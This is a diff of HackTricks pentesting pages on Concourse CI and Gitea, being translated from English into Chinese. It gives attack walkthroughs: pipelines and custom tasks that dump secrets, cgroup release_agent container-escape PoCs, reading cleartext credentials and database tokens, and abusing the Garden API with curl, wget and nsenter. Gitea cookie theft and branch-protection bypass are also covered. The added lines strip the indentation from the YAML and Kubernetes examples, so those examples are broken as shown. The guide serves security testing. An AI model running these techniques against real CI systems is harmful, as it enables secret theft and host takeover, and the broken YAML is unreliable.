+在上一节中,我们看到如何 **获取管道使用的所有秘密名称和变量**。**变量可能包含敏感信息**,而 **秘密的名称在稍后尝试窃取它们时将非常有用**。 -#### Session inside running or recently run container - -If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: +#### 在运行或最近运行的容器内会话 +如果您拥有足够的权限(**成员角色或更高**),您将能够 **列出管道和角色**,并使用以下命令直接进入 `/` **容器**: ```bash fly -t tutorial intercept --job pipeline-name/job-name fly -t tutorial intercept # To be presented a prompt with all the options ``` +有了这些权限,您可能能够: -With these permissions you might be able to: +- **窃取** **容器** 内部的秘密 +- 尝试 **逃逸** 到节点 +- 枚举/滥用 **云元数据** 端点(从 pod 和节点,如果可能的话) -- **Steal the secrets** inside the **container** -- Try to **escape** to the node -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) - -#### Pipeline Creation/Modification - -If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: +#### 管道创建/修改 +如果您拥有足够的权限(**成员角色或更高**),您将能够 **创建/修改新管道。** 请查看这个例子: ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +echo "$SUPER_SECRET" +sleep 1000 +params: +SUPER_SECRET: ((super.secret)) ``` +通过**修改/创建**新管道,您将能够: -With the **modification/creation** of a new pipeline you will be able to: +- **窃取** **秘密**(通过回显它们或进入容器并运行 `env`) +- **逃逸**到**节点**(通过给予您足够的权限 - `privileged: true`) +- 枚举/滥用**云元数据**端点(从 pod 和节点) +- **删除**创建的管道 -- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -- **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -- **Delete** created pipeline - -#### Execute Custom Task - -This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**): +#### 执行自定义任务 +这与之前的方法类似,但您可以**仅执行自定义任务**(这可能会更加**隐蔽**): ```yaml # For more task_config options check https://concourse-ci.org/tasks.html platform: linux image_resource: - type: registry-image - source: - repository: ubuntu +type: registry-image +source: +repository: ubuntu run: - path: sh - args: - - -cx - - | - env - sleep 1000 +path: sh +args: +- -cx +- | +env +sleep 1000 params: - SUPER_SECRET: ((super.secret)) +SUPER_SECRET: ((super.secret)) ``` ```bash fly -t tutorial execute --privileged --config task_config.yml ``` +#### 从特权任务逃逸到节点 -#### Escaping to the node from privileged task - -In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". 
- -In the following PoC we are going to use the release_agent to escape with some small modifications: +在前面的部分中,我们看到如何**使用concourse执行特权任务**。这不会给容器提供与docker容器中的特权标志完全相同的访问权限。例如,您不会在/dev中看到节点文件系统设备,因此逃逸可能会更“复杂”。 +在以下PoC中,我们将使用release_agent进行逃逸,并进行一些小的修改: ```bash # Mounts the RDMA cgroup controller and create a child cgroup # If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" @@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` - > [!WARNING] -> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node +> 正如您可能注意到的,这只是一个 [**常规 release_agent 逃逸**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md),只是修改了节点中 cmd 的路径 -#### Escaping to the node from a Worker container - -A regular release_agent escape with a minor modification is enough for this: +#### 从 Worker 容器逃逸到节点 +一个常规的 release_agent 逃逸,稍作修改就足够了: ```bash mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x @@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` +#### 从Web容器逃逸到节点 -#### Escaping to the node from the Web container - -Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). - -However, it stores **local credentials in clear text**: +即使Web容器禁用了某些防御,它也**不是以普通特权容器的身份运行**(例如,您**无法** **挂载**,并且**能力**非常**有限**,因此所有简单的逃逸容器的方法都是无效的)。 +然而,它以明文形式存储**本地凭据**: ```bash cat /concourse-auth/local-users test:test @@ -319,11 +304,9 @@ env | grep -i local_user CONCOURSE_MAIN_TEAM_LOCAL_USER=test CONCOURSE_ADD_LOCAL_USER=test:test ``` +您可以使用该凭据**登录到网络服务器**并**创建一个特权容器并逃逸到节点**。 -You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**. - -In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): - +在环境中,您还可以找到信息以**访问concourse使用的postgresql**实例(地址、**用户名**、**密码**和数据库等信息): ```bash env | grep -i postg CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 @@ -344,39 +327,35 @@ select * from refresh_token; select * from teams; #Change the permissions of the users in the teams select * from users; ``` - -#### Abusing Garden Service - Not a real Attack +#### 滥用 Garden 服务 - 不是一个真正的攻击 > [!WARNING] -> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before +> 这些只是关于该服务的一些有趣的笔记,但由于它仅在本地主机上监听,这些笔记不会带来我们尚未利用过的任何影响 -By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). 
This sound pretty good for an attacker, but there are some nice protections: +默认情况下,每个 concourse worker 将在 7777 端口运行一个 [**Garden**](https://github.com/cloudfoundry/garden) 服务。该服务由 Web 主机用于指示 worker **需要执行的内容**(下载镜像并运行每个任务)。这对攻击者来说听起来不错,但有一些很好的保护措施: -- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. - -Concourse workers run with high container privileges: +- 它仅**在本地暴露**(127..0.0.1),我认为当 worker 通过特殊的 SSH 服务对 Web 进行身份验证时,会创建一个隧道,以便 Web 服务器可以**与每个 worker 内的 Garden 服务进行通信**。 +- Web 服务器**每隔几秒监控运行的容器**,并且**意外的**容器会被**删除**。因此,如果您想要**运行自定义容器**,您需要**篡改** Web 服务器与 Garden 服务之间的**通信**。 +Concourse workers 以高容器权限运行: ``` Container Runtime: docker Has Namespaces: - pid: true - user: false +pid: true +user: false AppArmor Profile: kernel Capabilities: - BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read +BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read Seccomp: disabled ``` - -However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. +然而,像**挂载**节点的 /dev 设备或 release_agent 的技术**不会工作**(因为节点的真实设备与文件系统不可访问,只有一个虚拟设备)。我们无法访问节点的进程,因此在没有内核漏洞的情况下逃离节点变得复杂。 > [!NOTE] -> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. +> 在上一节中,我们看到如何从特权容器中逃脱,因此如果我们可以在**当前** **工作者**创建的**特权容器**中**执行**命令,我们就可以**逃离到节点**。 -Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. 
- -**Getting inside a running privileged container** +请注意,在玩弄 concourse 时,我注意到当一个新容器被生成以运行某些东西时,容器进程可以从工作者容器访问,因此就像一个容器在内部创建一个新容器。 +**进入一个正在运行的特权容器** ```bash # Get current container curl 127.0.0.1:7777/containers @@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties # Execute a new process inside a container ## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' # OR instead of doing all of that, you could just get into the ns of the process of the privileged container nsenter --target 76011 --mount --uts --ipc --net --pid -- sh ``` +**创建一个新的特权容器** -**Creating a new privileged container** - -You can very easily create a new container (just run a random UID) and execute something on it: - +您可以非常轻松地创建一个新容器(只需运行一个随机 UID)并在其上执行某些操作: ```bash curl -X POST http://127.0.0.1:7777/containers \ - -H 'Content-Type: application/json' \ - -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' +-H 'Content-Type: application/json' \ +-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' # Wget will be stucked there as long as the process is being executed wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' ``` - -However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: - +然而,网络服务器每隔几秒钟检查正在运行的容器,如果发现意外的容器,它将被删除。由于通信是在HTTP中进行的,您可以篡改通信以避免意外容器的删除: ``` GET /containers HTTP/1.1. Host: 127.0.0.1:7777. @@ -434,13 +409,8 @@ Host: 127.0.0.1:7777. User-Agent: Go-http-client/1.1. Accept-Encoding: gzip. 
``` - -## References +## 参考 - https://concourse-ci.org/vars.html {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md index 0cc6363a7..bef222449 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -2,25 +2,22 @@ {{#include ../../banners/hacktricks-training.md}} -## Testing Environment +## 测试环境 -### Running Concourse +### 运行 Concourse -#### With Docker-Compose - -This docker-compose file simplifies the installation to do some tests with concourse: +#### 使用 Docker-Compose +这个 docker-compose 文件简化了安装,以便进行一些与 concourse 的测试: ```bash wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml docker-compose up -d ``` +您可以从网络上下载适用于您的操作系统的命令行 `fly`,地址为 `127.0.0.1:8080` -You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` - -#### With Kubernetes (Recommended) - -You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). +#### 使用 Kubernetes(推荐) +您可以使用 helm-chart 轻松在 **Kubernetes**(例如 **minikube**)中部署 concourse: [**concourse-chart**](https://github.com/concourse/concourse-chart)。 ```bash brew install helm helm repo add concourse https://concourse-charts.storage.googleapis.com/ @@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse # If you need to delete it helm delete concourse-release ``` - -After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: - +在生成 concourse 环境后,您可以生成一个密钥并授予在 concourse web 中运行的 SA 访问 K8s 密钥的权限: ```yaml echo 'apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: - name: read-secrets +name: read-secrets rules: - apiGroups: [""] - resources: ["secrets"] - verbs: ["get"] +resources: ["secrets"] +verbs: ["get"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: - name: read-secrets-concourse +name: read-secrets-concourse roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: read-secrets +apiGroup: rbac.authorization.k8s.io +kind: ClusterRole +name: read-secrets subjects: - kind: ServiceAccount - name: concourse-release-web - namespace: default +name: concourse-release-web +namespace: default --- apiVersion: v1 kind: Secret metadata: - name: super - namespace: concourse-release-main +name: super +namespace: concourse-release-main type: Opaque data: - secret: MWYyZDFlMmU2N2Rm +secret: MWYyZDFlMmU2N2Rm ' | kubectl apply -f - ``` +### 创建管道 -### Create Pipeline +管道由一系列 [Jobs](https://concourse-ci.org/jobs.html) 组成,其中包含一个有序的 [Steps](https://concourse-ci.org/steps.html) 列表。 -A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). 
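Once the chart is up, you typically reach the web node with a port-forward and log in with `fly` before defining pipelines. A sketch assuming the `concourse-release` release name used above and the chart's default `test:test` local user (service name and credentials may differ in your deployment):

```bash
kubectl port-forward svc/concourse-release-web 8080:8080 &
fly -t lab login -c http://127.0.0.1:8080 -u test -p test
fly -t lab workers     # sanity check that a worker registered
fly -t lab pipelines
```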
+### 步骤 -### Steps +可以使用几种不同类型的步骤: -Several different type of steps can be used: +- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **运行一个** [**task**](https://concourse-ci.org/tasks.html) +- the [`get` step](https://concourse-ci.org/get-step.html) 获取一个 [resource](https://concourse-ci.org/resources.html) +- the [`put` step](https://concourse-ci.org/put-step.html) 更新一个 [resource](https://concourse-ci.org/resources.html) +- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) 配置一个 [pipeline](https://concourse-ci.org/pipelines.html) +- the [`load_var` step](https://concourse-ci.org/load-var-step.html) 将一个值加载到 [local var](https://concourse-ci.org/vars.html#local-vars) 中 +- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) 并行运行步骤 +- the [`do` step](https://concourse-ci.org/do-step.html) 顺序运行步骤 +- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) 多次运行一个步骤;每种变量值组合运行一次 +- the [`try` step](https://concourse-ci.org/try-step.html) 尝试运行一个步骤,即使步骤失败也会成功 -- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails +每个 [step](https://concourse-ci.org/steps.html) 在 [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) 中在其 **自己的容器** 中运行。您可以在容器内运行任何您想要的内容 _(即运行我的测试,运行这个 bash 脚本,构建这个镜像等)_。因此,如果您有一个包含五个步骤的作业,Concourse 将为每个步骤创建五个容器。 -Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. - -Therefore, it's possible to indicate the type of container each step needs to be run in. 
- -### Simple Pipeline Example +因此,可以指示每个步骤需要运行的容器类型。 +### 简单管道示例 ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +sleep 1000 +echo "$SUPER_SECRET" +params: +SUPER_SECRET: ((super.secret)) ``` ```bash @@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch # From another console fly -t tutorial intercept --job pipe-name/simple ``` +检查 **127.0.0.1:8080** 以查看管道流程。 -Check **127.0.0.1:8080** to see the pipeline flow. +### 带有输出/输入管道的 Bash 脚本 -### Bash script with output/input pipeline +可以 **将一个任务的结果保存到文件中** 并指明它是一个输出,然后将下一个任务的输入指明为上一个任务的输出。Concourse 所做的是 **在新任务中挂载上一个任务的目录,以便您可以访问上一个任务创建的文件**。 -It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. +### 触发器 -### Triggers +您不需要每次手动触发作业,您还可以编程使其每次运行时自动触发: -You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: +- 一段时间过去:[时间资源](https://github.com/concourse/time-resource/) +- 在主分支的新提交时:[Git 资源](https://github.com/concourse/git-resource) +- 新的 PR:[Github-PR 资源](https://github.com/telia-oss/github-pr-resource) +- 获取或推送您应用的最新镜像:[Registry-image 资源](https://github.com/concourse/registry-image-resource/) -- Some time passes: [Time resource](https://github.com/concourse/time-resource/) -- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) - -Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) +查看一个在主分支新提交时触发的 YAML 管道示例,链接在 [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md index bf4f6485a..dbcf3ceeb 100644 --- a/src/pentesting-ci-cd/gitea-security/README.md +++ b/src/pentesting-ci-cd/gitea-security/README.md @@ -1,142 +1,130 @@ -# Gitea Security +# Gitea 安全 {{#include ../../banners/hacktricks-training.md}} -## What is Gitea +## 什么是 Gitea -**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. 
+**Gitea** 是一个 **自托管的社区管理轻量级代码托管** 解决方案,使用 Go 编写。 ![](<../../images/image (160).png>) -### Basic Information +### 基本信息 {{#ref}} basic-gitea-information.md {{#endref}} -## Lab - -To run a Gitea instance locally you can just run a docker container: +## 实验室 +要在本地运行 Gitea 实例,您只需运行一个 docker 容器: ```bash docker run -p 3000:3000 gitea/gitea ``` +连接到端口 3000 以访问网页。 -Connect to port 3000 to access the web page. - -You could also run it with kubernetes: - +您也可以使用 kubernetes 运行它: ``` helm repo add gitea-charts https://dl.gitea.io/charts/ helm install gitea gitea-charts/gitea ``` +## 未经身份验证的枚举 -## Unauthenticated Enumeration +- 公共仓库: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +- 注册用户: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +- 注册组织: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) -- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) +请注意,**默认情况下 Gitea 允许新用户注册**。这不会给新用户提供对其他组织/用户仓库的特别有趣的访问权限,但**登录用户**可能能够**查看更多的仓库或组织**。 -Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. +## 内部利用 -## Internal Exploitation +在这个场景中,我们假设你已经获得了一些对 GitHub 账户的访问权限。 -For this scenario we are going to suppose that you have obtained some access to a github account. +### 使用用户凭据/网页 Cookie -### With User Credentials/Web Cookie +如果你以某种方式已经获得了组织内某个用户的凭据(或者你窃取了一个会话 Cookie),你可以**直接登录**并检查你对哪些**仓库**拥有**权限**,你在哪些**团队**中,**列出其他用户**,以及**仓库是如何保护的**。 -If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +请注意,**可能会使用 2FA**,因此你只有在能够**通过该检查**的情况下才能访问这些信息。 > [!NOTE] -> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +> 请注意,如果你**设法窃取了 `i_like_gitea` Cookie**(当前配置为 SameSite: Lax),你可以**完全冒充该用户**而无需凭据或 2FA。 -### With User SSH Key +### 使用用户 SSH 密钥 -Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. 
However, you can **enumerate local settings** to get information about the repos and user you have access to: +Gitea 允许**用户**设置**SSH 密钥**,该密钥将作为**代表他们部署代码的身份验证方法**(不适用 2FA)。 +使用此密钥,你可以对用户拥有某些权限的**仓库进行更改**,但是你不能使用它访问 Gitea API 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +如果用户将其用户名配置为他的 gitea 用户名,您可以访问他在 _https://github.com/\.keys_ 中设置的 **公钥**,您可以检查此内容以确认您找到的私钥是否可以使用。 -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH 密钥** 也可以在仓库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从仓库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。 -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG 密钥 -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。 +在本地检查当前用户是否有任何密钥: ```shell gpg --list-secret-keys --keyid-format=long ``` +### 使用用户令牌 -### With User Token +有关[**用户令牌的介绍,请查看基本信息**](basic-gitea-information.md#personal-access-tokens)。 -For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). +用户令牌可以**替代密码**来**认证**Gitea服务器[**通过API**](https://try.gitea.io/api/swagger#/)。它将对用户具有**完全访问权限**。 -A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user. +### 使用Oauth应用程序 -### With Oauth Application +有关[**Gitea Oauth应用程序的介绍,请查看基本信息**](./#with-oauth-application)。 -For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application). +攻击者可能创建一个**恶意Oauth应用程序**来访问接受它们的用户的特权数据/操作,这可能是网络钓鱼活动的一部分。 -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +如基本信息中所述,该应用程序将对用户帐户具有**完全访问权限**。 -As explained in the basic information, the application will have **full access over the user account**. +### 绕过分支保护 -### Branch Protection Bypass +在Github中,我们有**github actions**,默认情况下会获得对仓库的**写入访问权限**的**令牌**,可以用来**绕过分支保护**。在这种情况下**不存在**,因此绕过的方式更有限。但让我们看看可以做些什么: -In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: +- **启用推送**:如果任何具有写入权限的人可以推送到该分支,只需推送即可。 +- **白名单限制推送**:同样,如果您是此列表的一部分,则可以推送到该分支。 +- **启用合并白名单**:如果有合并白名单,您需要在其中。 +- **需要的批准大于0**:那么...您需要妥协另一个用户。 +- **限制批准给白名单用户**:如果只有白名单用户可以批准...您需要妥协另一个在该列表中的用户。 +- **撤销过期批准**:如果批准没有随着新提交而被移除,您可以劫持一个已经批准的PR来注入您的代码并合并PR。 -- **Enable Push**: If anyone with write access can push to the branch, just push to it. 
-- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. -- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -- **Require approvals is bigger than 0**: Then... you need to compromise another user -- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. +请注意**如果您是组织/仓库管理员**,您可以绕过保护。 -Note that **if you are an org/repo admin** you can bypass the protections. +### 枚举Webhooks -### Enumerate Webhooks +**Webhooks**能够**将特定的gitea信息发送到某些地方**。您可能能够**利用这种通信**。\ +然而,通常在**webhook**中设置了一个您**无法检索**的**密钥**,这将**防止**外部用户知道webhook的URL但不知道密钥来**利用该webhook**。\ +但在某些情况下,人们不是将**密钥**设置在其位置,而是将其**作为参数设置在URL中**,因此**检查URL**可能允许您**找到密钥**和其他您可以进一步利用的地方。 -**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. +Webhooks可以在**仓库和组织级别**设置。 -Webhooks can be set at **repo and at org level**. +## 后期利用 -## Post Exploitation +### 服务器内部 -### Inside the server +如果您以某种方式设法进入运行gitea的服务器,您应该搜索gitea配置文件。默认情况下,它位于`/data/gitea/conf/app.ini` -If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` +在此文件中,您可以找到**密钥**和**密码**。 -In this file you can find **keys** and **passwords**. +在gitea路径(默认:/data/gitea)中,您还可以找到有趣的信息,例如: -In the gitea path (by default: /data/gitea) you can find also interesting information like: +- **sqlite**数据库:如果gitea不使用外部数据库,它将使用sqlite数据库。 +- **会话**在会话文件夹中:运行`cat sessions/*/*/*`可以看到已登录用户的用户名(gitea也可以将会话保存在数据库中)。 +- **jwt私钥**在jwt文件夹中。 +- 该文件夹中可能找到更多**敏感信息**。 -- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea 